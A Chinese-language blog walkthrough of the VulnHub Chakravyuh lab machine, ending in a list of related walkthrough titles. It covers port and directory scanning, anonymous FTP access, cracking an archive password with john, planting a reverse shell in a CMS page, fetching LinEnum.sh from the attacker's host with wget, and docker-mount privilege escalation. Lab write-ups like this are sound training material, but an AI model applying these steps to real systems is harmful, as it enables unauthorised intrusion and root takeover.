vulnhub-Chakravyuh打靶过程
chakravyuh靶机: https://www.vulnhub.com/?q=Chakravyuh.
2、通过分析可知192.168.1.8应该是靶机所在的ip,使用nmap对目标ip进行扫描:nmap -p- -A 192.168.1.8
3、可以发现目标主机开放了三个端口->22,80,65530 对应的服务为ssh web ftp
4、查看web端口提供的服务:
5、通过主页面显示只是一个简单的web页面,并没有提供什么其他的服务
6、进行目录扫描:python3.8 dirsearch.py -u http://192.168.1.8 -e*
7、扫描结束后发现4个大目录:/gila;/index.html;/javascript;/phpmyadmin
8、看到phpmyadmin后我就想当兴奋立刻访问看看能不能用弱口令进入:
10、可以看到数据库的版本为4.6.6,去网上看看4.6.6的版本有没有对应的漏洞可以使用:
11、并没有相关的漏洞,因此此路不通
12、刚刚的目录扫描还有其他的目录,我们访问一下http://192.168.1.8/gila:
13、通过网页信息可以发现这是一个cms,在网上查看这个cms有没有相应的漏洞 :
15、发现需要登录,尝试弱口令:admin,admin和万能密码登录均不对:
17、看到里面提供的ftp服务,并且里面有一个共享文件夹 pub,尝试ftp连接 ftp 192.168.1.8 65530 使用匿名登录Anonymous:
18、发现里面有个压缩包,将压缩包下载下来:get arjun.7z
19、解压下载的文件,发现解压的时候需要密码:
22、生成了一个hash的文件,我们使用john使用rockyou进行过撞库
John --wordlist=/usr/share/wordlists/rockyou.txt hash:
24、可以看到压缩包的密码为family,用这个密码进行解压:
27、解码之后得到结果:gila:admin@gmail.com:princesa ,这个看到gila 看到admin 想到应该是网站后台的登录账号密码去尝试一下:
28、发现可以登录进来,并且发现了一个index.php是我们可以修改的 用phpinfo测试一下:
29、发现可以进行执行,我们将index里添加上我们反弹shell的木马:
31、将终端美化一下 python3 -c ‘import pty;pty.spawn(“bin/bash”)’:
33、发现并不是root用户,需要想办法提权,先使用脚本跑一边,给提权提供思路,先将脚本下载到目标主机 在本地开一个web服务 python -m SimpleHTTPServer:
34、将脚本下载到目标主机 wget 192.168.1.6:8000/LinEnum.sh:
35、下载下来完成给它执行权限,并运行 chmod 777 LinEnum.sh并运行./LinEnum.sh:
36、可以看到这里面有个docker的提权的路径,尝试一下,查看所有的docker 镜像 docker ps -all:
37、可以看到一个alpine的镜像,我们可以将root的所有目录都映射到这个镜像下
docker run -v /root:/mnt -it alpine:
vulnhub-Chakravyuh打靶过程相关推荐
- 实弹打靶过程中有哪些注意事项
在室内射击场中,实弹打靶和模拟影像打靶可以有效结合,是目前智能化靶场必备的训练配套设施.在室内射击场建设中,需要预留出模拟影像打靶设备的安装位置,并且实弹打靶和模拟影像射击训练不可同时进行. 在进行实 ...
- Hacker_kid靶机打靶过程及思路
1.常规端口服务及侦探 2.发现9999存在python轻量级web开发框架tornado 3.怀疑udp53端口作为同一个域之间传输数据的方式,扫描发现存在udp53端口 sudo nmap -p5 ...
- Vegeta靶机打靶过程及思路
1.常规端口扫描及发现 2.发现只有80端口可以突破,于是进行大字典的扫描,得到某个目录下存在一张图片 3.使用zbarimg工具进行读取但是没有得到任何有效信息,解码得到的文字并不是登录密码 4.再 ...
- Tre靶机打靶过程及思路
1.常规端口及服务发现 2.访问到401认证界面,弱口令修改之后登录成功,利用mantis最新版本rce突破外围打点成功 3.访问到敏感目录下sysytem下的数据库账号配置文件,利用该账号进入数据库 ...
- Vikings靶机打靶过程及思路
1.常规端口服务侦探 2.用gubuster进行路径爆破,发现war下war-is-over新目录 gobuster dir -r -u http://10.0.2.16/ -x txt,html,p ...
- vulnhub chakravyuh
扫描局域网靶机 目标为192.168.2.8 扫描端口: 分析: 22端口为ssh openssh 7.6p1版本 暂无漏洞 80端口http服务 apache中间件 65530端口为ftp服务存在匿 ...
- Vulnhub靶机:VEGETA_ 1
目录 介绍 信息收集 主机发现 主机信息探测 网站探测 目录扫描 cyberchef解密 分析二维码 二次目录爆破 分析摩斯电码-音频 提权 介绍 系列:Vegeta(此系列共1台) 发布日期:202 ...
- vulnhub靶机 trollcave-v1-2
下载靶机 地址:Trollcave: 1.2 ~ VulnHub 问题阐述 使用virtualbox,kali和靶机均使用桥接网络 kali:172.20.10.10 靶机:172.20.10.11 ...
- 渗透测试-靶机打靶思路与方法
渗透测试-靶机打靶思路与方法 文章目录 渗透测试-靶机打靶思路与方法 一.对靶机进行信息收集 1.首先对目标存活靶机发起嗅探: 2.对目标主机开放端口及服务发起探测 3.对非web端口的服务发起迅速的 ...
最新文章
- linux下mkdir头文件_Linux部分常用命令学习记录
- 电工接线模拟仿真软件_VERICUT数控加工仿真软件,最强的数控加工模拟软件,你知道么?...
- c++ qt qlistwidget清空_Qt编写控件属性设计器12-用户属性
- 19张图带你梳理SpringCloud体系中的重要知识点!
- ThinkpadT470接通电源开机显示电量0%充不进电且电源指示灯不亮的解决办法
- Struts第八篇【资源国际化、对比JSP的资源国际化】
- robotstudio工作站建立
- 常见英语人名及其音标和中文翻译
- gitlab将个人项目与他人共享设置
- 台式计算机联网,【实现台式电脑无线上网的2种方法】
- 计算电路门数和nand2的面积
- python文件转换为pyd
- 第13届景驰-埃森哲杯广东工业大学ACM程序设计大赛 G	 旋转矩阵 【模拟】
- 美国L-1A签证简介
- 【Linux学习笔记④】——Shell程序设计【变量 输入与输出 条件表达式 判断语句 循环语句 Shell函数】
- S32K144(18)LPI2C
- php5.2 nts 下载,php_xdebug-2.1.0-5.2-vc6-nts.dll
- STM32单片机CAN总线汽车自动会车灯远近光切换
- python 股票分析常用库_Python数据分析常用库有哪些?Python学习!
- 开源的WebVR直播播放器